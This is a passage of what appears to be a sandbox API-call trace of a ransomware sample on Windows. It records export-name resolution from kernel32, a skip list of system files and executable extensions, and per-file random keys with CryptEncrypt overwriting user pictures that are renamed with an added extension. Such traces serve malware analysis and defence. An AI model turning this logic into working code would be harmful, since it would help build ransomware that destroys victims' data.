(lpString="CREATETHREADPOOLIO") returned 18 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.286] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.286] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.286] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.286] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.286] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.286] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.286] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.286] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.286] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.286] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.286] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.286] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.287] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.287] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.287] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.287] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.287] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.287] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.287] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.287] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.287] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.287] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.287] lstrlenA (lpString="DELETEATOM") returned 10 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.287] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.287] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.287] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.287] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.287] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.288] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.288] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.288] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.288] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.288] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.288] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.288] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.288] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.288] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.288] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.288] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.288] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.288] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.288] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.288] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.288] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.288] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.288] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.288] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.289] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.289] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.289] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.289] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.289] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.289] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.289] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.289] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.289] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.289] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.289] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.289] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.289] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.289] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.289] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.289] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.289] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.289] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.289] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.290] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp") returned 68 [0086.290] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp.51Uk") returned 73 [0086.290] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\khinzcsap9dzrt.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp.51Uk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\khinzcsap9dzrt.bmp.51uk"), dwFlags=0x0) returned 1 [0086.290] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.291] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.291] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.291] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x317d3730, ftCreationTime.dwHighDateTime=0x1d4cb57, ftLastAccessTime.dwLowDateTime=0x6d082030, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0x6d082030, ftLastWriteTime.dwHighDateTime=0x1d4ccab, nFileSizeHigh=0x0, nFileSizeLow=0xbb4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lW_4.gif", cAlternateFileName="")) returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="autorun.inf") returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="boot.ini") returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="desktop.ini") returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="ntuser.dat") returned -1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="iconcache.db") returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="bootsect.bak") returned 1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="ntuser.dat.log") returned -1 [0086.291] lstrcmpiW (lpString1="lW_4.gif", lpString2="thumbs.db") returned -1 [0086.292] lstrcmpiW (lpString1="lW_4.gif", lpString2="Bootfont.bin") returned 1 [0086.292] lstrlenW (lpString="lW_4.gif") returned 8 [0086.292] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.292] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.292] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.292] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.292] lstrlenW (lpString="lW_4.gif") returned 8 [0086.292] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="lW_4.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif" [0086.292] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\lW_4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\lw_4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.292] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=47946) returned 1 [0086.292] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.292] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.292] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.293] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.293] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.293] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.293] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.294] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.294] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.295] CloseHandle (hObject=0x43c) returned 1 [0086.295] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.295] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.296] CloseHandle (hObject=0x0) returned 0 [0086.296] CloseHandle (hObject=0x438) returned 1 [0086.296] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.296] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.296] GetTickCount () returned 0x114e070 [0086.297] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.297] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.297] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.297] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.297] lstrlenA (lpString="kernel32.dll") returned 12 [0086.297] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.297] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.298] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.298] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.298] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.298] lstrlenA (lpString="ADDATOMA") returned 8 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.298] lstrlenA (lpString="ADDATOMW") returned 8 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.298] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.298] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.298] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.298] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.298] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.298] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.298] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.298] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.298] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.298] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.298] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.298] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.298] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.298] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.299] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.299] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.299] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.299] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.299] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.299] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.299] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.299] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.299] lstrlenA (lpString="BACKUPWRITE") returned 11 